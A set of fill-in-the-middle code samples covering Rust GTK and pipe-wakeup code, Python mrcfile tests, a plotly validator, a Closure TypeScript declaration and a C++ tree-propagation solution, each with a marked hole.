<|file_name|>level_bar.rs<|end_file_name|><|fim▁begin|>// This file is part of rgtk.
//
// rgtk is free software: you can redistribute it and/or modify
// it under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// rgtk is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with rgtk. If not, see <http://www.gnu.org/licenses/>.
//! A bar that can be used as a level indicator
#![cfg_attr(not(feature = "GTK_3_8"), allow(unused_imports))]
use libc::c_double;
use glib::translate::ToGlibPtr;
use gtk::{self, ffi};
use glib::{to_bool, to_gboolean};
use gtk::{LevelBarMode};
use gtk::cast::GTK_LEVELBAR;
/// LevelBar — A bar that can be used as a level indicator
/*
* # Signal availables:
* * `offset-changed` : Has Details
*/
struct_Widget!(LevelBar);
impl LevelBar {
pub fn new() -> Option<LevelBar> {
let tmp_pointer = unsafe { ffi::gtk_level_bar_new() };
check_pointer!(tmp_pointer, LevelBar)
}
pub fn new_for_interval(min: f64, max: f64) -> Option<LevelBar> {
let tmp_pointer = unsafe { ffi::gtk_level_bar_new_for_interval(min as c_double, max as c_double) };
check_pointer!(tmp_pointer, LevelBar)
}
pub fn set_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_value(GTK_LEVELBAR(self.pointer)) as f64
}
}
pub fn set_mode(&mut self, mode: LevelBarMode) -> () {
unsafe {
ffi::gtk_level_bar_set_mode(GTK_LEVELBAR(self.pointer), mode);
}
}
pub fn get_mode(&self) -> LevelBarMode {
unsafe {
ffi::gtk_level_bar_get_mode(GTK_LEVELBAR(self.pointer))
}
}
pub fn set_min_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_min_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_min_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_min_value(GTK_LEVELBAR(self.pointer)) as c_double
}
}
pub fn set_max_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_max_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_max_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_max_value(GTK_LEVELBAR(self.pointer)) as c_double
}
}
#[cfg(feature = "GTK_3_8")]
pub fn set_inverted(&mut self, inverted: bool) -> () {
unsafe { ffi::gtk_level_bar_set_inverted(GTK_LEVELBAR(self.pointer), to_gboolean(inverted)); }
}
#[cfg(feature = "GTK_3_8")]
pub fn get_inverted(&self) -> bool {
unsafe { to_bool(ffi::gtk_level_bar_get_inverted(GTK_LEVELBAR(self.pointer))) }
}<|fim▁hole|> GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0,
value as c_double)
}
}
pub fn remove_offset_value(&mut self, name: &str) -> () {
unsafe {
ffi::gtk_level_bar_remove_offset_value(
GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0);
}
}
pub fn get_offset_value(&self, name: &str) -> Option<f64> {
unsafe {
let mut value = 0.;
let res = to_bool(
ffi::gtk_level_bar_get_offset_value(
GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0,
&mut value));
if res {
Some(value)
}
else {
None
}
}
}
}
impl_drop!(LevelBar);
impl_TraitWidget!(LevelBar);
impl gtk::OrientableTrait for LevelBar {}
impl_widget_events!(LevelBar);<|fim▁end|>
|
pub fn add_offset_value(&mut self, name: &str, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_add_offset_value(
|
<|file_name|>posix.rs<|end_file_name|><|fim▁begin|>use {TryRead, TryWrite};
use io::{self, PipeReader, PipeWriter};
use std::mem;
use std::os::unix::io::{Fd, AsRawFd};
/*
*
* ===== Awakener =====
*
*/
pub struct Awakener {
reader: PipeReader,
writer: PipeWriter,
}
impl Awakener {
pub fn new() -> io::Result<Awakener> {
let (rd, wr) = try!(io::pipe());
Ok(Awakener {
reader: rd,
writer: wr
})<|fim▁hole|> }
pub fn wakeup(&self) -> io::Result<()> {
// A hack, but such is life. PipeWriter is backed by a single FD, which
// is thread safe.
unsafe {
let wr: &mut PipeWriter = mem::transmute(&self.writer);
wr.write_slice(b"0x01").map(|_| ())
}
}
pub fn cleanup(&self) {
let mut buf = [0; 128];
loop {
// Also a bit hackish. It would be possible to split up the read /
// write sides of the awakener, but that would be a more
// significant refactor. A transmute here is safe.
unsafe {
let rd: &mut PipeReader = mem::transmute(&self.reader);
// Consume data until all bytes are purged
match rd.read_slice(&mut buf) {
Ok(Some(i)) if i > 0 => {},
_ => return,
}
}
}
}
}<|fim▁end|>
|
}
pub fn as_raw_fd(&self) -> Fd {
self.reader.as_raw_fd()
|
<|file_name|>test_mrcmemmap.py<|end_file_name|><|fim▁begin|># Copyright (c) 2016, Science and Technology Facilities Council
# This software is distributed under a BSD licence. See LICENSE.txt.
"""
Tests for mrcmemmap.py
"""
# Import Python 3 features for future-proofing
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import unittest
import numpy as np
from .test_mrcfile import MrcFileTest<|fim▁hole|>
class MrcMemmapTest(MrcFileTest):
"""Unit tests for MRC file I/O with memory-mapped files.
Note that this test class inherits MrcFileTest to ensure all of the tests
for MrcObject and MrcFile work correctly for the MrcMemmap subclass.
"""
def setUp(self):
# Set up as if for MrcFileTest
super(MrcMemmapTest, self).setUp()
# Set the newmrc method to the MrcMemmap constructor
self.newmrc = MrcMemmap
# Set up parameters so MrcObject tests run on the MrcMemmap class
obj_mrc_name = os.path.join(self.test_output, 'test_mrcobject.mrc')
self.mrcobject = MrcMemmap(obj_mrc_name, 'w+', overwrite=True)
def test_repr(self):
"""Override test to change expected repr string."""
with MrcMemmap(self.example_mrc_name) as mrc:
assert repr(mrc) == "MrcMemmap('{0}', mode='r')".format(self.example_mrc_name)
def test_exception_raised_if_file_is_too_small_for_reading_data(self):
"""Override test to change expected error message."""
with self.newmrc(self.temp_mrc_name, mode='w+') as mrc:
mrc.set_data(np.arange(24, dtype=np.int16).reshape(2, 3, 4))
assert mrc.header.mz == 2
mrc.header.mz = mrc.header.nz = 3
# The exception type and message are different on Linux and Windows
expected_error_msg = ("mmap length is greater than file size"
"|Not enough storage is available")
with self.assertRaisesRegex(Exception, expected_error_msg):
self.newmrc(self.temp_mrc_name)
def test_data_is_not_copied_unnecessarily(self):
"""Override test because data has to be copied for mmap."""
data = np.arange(6, dtype=np.int16).reshape(1, 2, 3)
self.mrcobject.set_data(data)
assert self.mrcobject.data is not data
def test_data_array_cannot_be_changed_after_closing_file(self):
mrc = self.newmrc(self.temp_mrc_name, mode='w+')
mrc.set_data(np.arange(12, dtype=np.int16).reshape(3, 4))
data_ref = mrc.data
# Check that writing to the data array does not raise an exception
data_ref[0,0] = 1
mrc.close()
assert not data_ref.flags.writeable
with self.assertRaises(ValueError):
data_ref[0,0] = 2
if __name__ == "__main__":
unittest.main()<|fim▁end|>
|
from mrcfile.mrcmemmap import MrcMemmap
|
<|file_name|>_smoothing.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators
class SmoothingValidator(_plotly_utils.basevalidators.NumberValidator):<|fim▁hole|> self, plotly_name="smoothing", parent_name="contourcarpet.line", **kwargs
):
super(SmoothingValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
max=kwargs.pop("max", 1.3),
min=kwargs.pop("min", 0),
**kwargs
)<|fim▁end|>
|
def __init__(
|
<|file_name|>abstractmoduleloader.d.ts<|end_file_name|><|fim▁begin|>declare module goog.module {
/**
* An interface that loads JavaScript modules.
* @interface
*/
interface AbstractModuleLoader {
/**
* Loads a list of JavaScript modules.
*
* @param {Array<string>} ids The module ids in dependency order.
* @param {Object} moduleInfoMap A mapping from module id to ModuleInfo object.
* @param {function()?=} opt_successFn The callback if module loading is a
* success.
* @param {function(?number)?=} opt_errorFn The callback if module loading is an
* error.
* @param {function()?=} opt_timeoutFn The callback if module loading times out.
* @param {boolean=} opt_forceReload Whether to bypass cache while loading the
* module.
*/
loadModules(ids: Array<string>, moduleInfoMap: Object, opt_successFn?: () => any, opt_errorFn?: (arg0: number) => any, opt_timeoutFn?: () => any, opt_forceReload?: boolean): void;
/**
* Pre-fetches a JavaScript module.
*
* @param {string} id The module id.
* @param {!goog.module.ModuleInfo} moduleInfo The module info.
*/<|fim▁hole|> prefetchModule(id: string, moduleInfo: goog.module.ModuleInfo): void;
}
}<|fim▁end|>
| |
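A minimal sketch of a class satisfying this interface; the script-tag injection and '/modules/' URL layout are invented for illustration, not Closure's real module loader:

class SimpleModuleLoader {
  loadModules(ids: Array<string>, moduleInfoMap: Object,
              opt_successFn?: () => any): void {
    for (const id of ids) {
      // Hypothetical: inject one <script> per module id, in dependency order.
      const el = document.createElement('script');
      el.src = '/modules/' + id + '.js'; // assumed URL layout
      document.head.appendChild(el);
    }
    if (opt_successFn) opt_successFn();
  }

  prefetchModule(id: string, moduleInfo: Object): void {
    // Hypothetical: hint the browser to fetch the module's script early.
    const link = document.createElement('link');
    link.rel = 'prefetch';
    link.href = '/modules/' + id + '.js';
    document.head.appendChild(link);
  }
}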
<|file_name|>0948.cpp<|end_file_name|><|fim▁begin|>#include<queue>
#include<cstdio>
#include<algorithm>
using namespace std;
const int N = 20012, inf = 2000000000;
int p[N], f[N], t[N], s[N], dg[N];
int main() {
int i, j, n;
while (scanf("%d", &n) == 1 && n) {
fill(dg, dg+n, 0);
fill(s, s+n, inf);
for (i = 0; i < n; ++i) {
scanf("%d %d %d", p+i, f+i, t+i);
++dg[--p[i]];
}
queue<int> Q;
for (i = 0; i < n; ++i)
if (dg[i] == 0) {
s[i] = 0;
Q.push(i);
}
while (!Q.empty()) {
i = Q.front();
Q.pop();
if (p[i] < 0) continue;
j = (t[i] + s[i])*2 + !f[i];
if (j < s[p[i]]) s[p[i]] = j;
if (!--dg[p[i]]) Q.push(p[i]);
}
for (i = 0; p[i] >= 0; ++i);<|fim▁hole|> printf("%d\n", s[i] + t[i]);
}
}<|fim▁end|>
|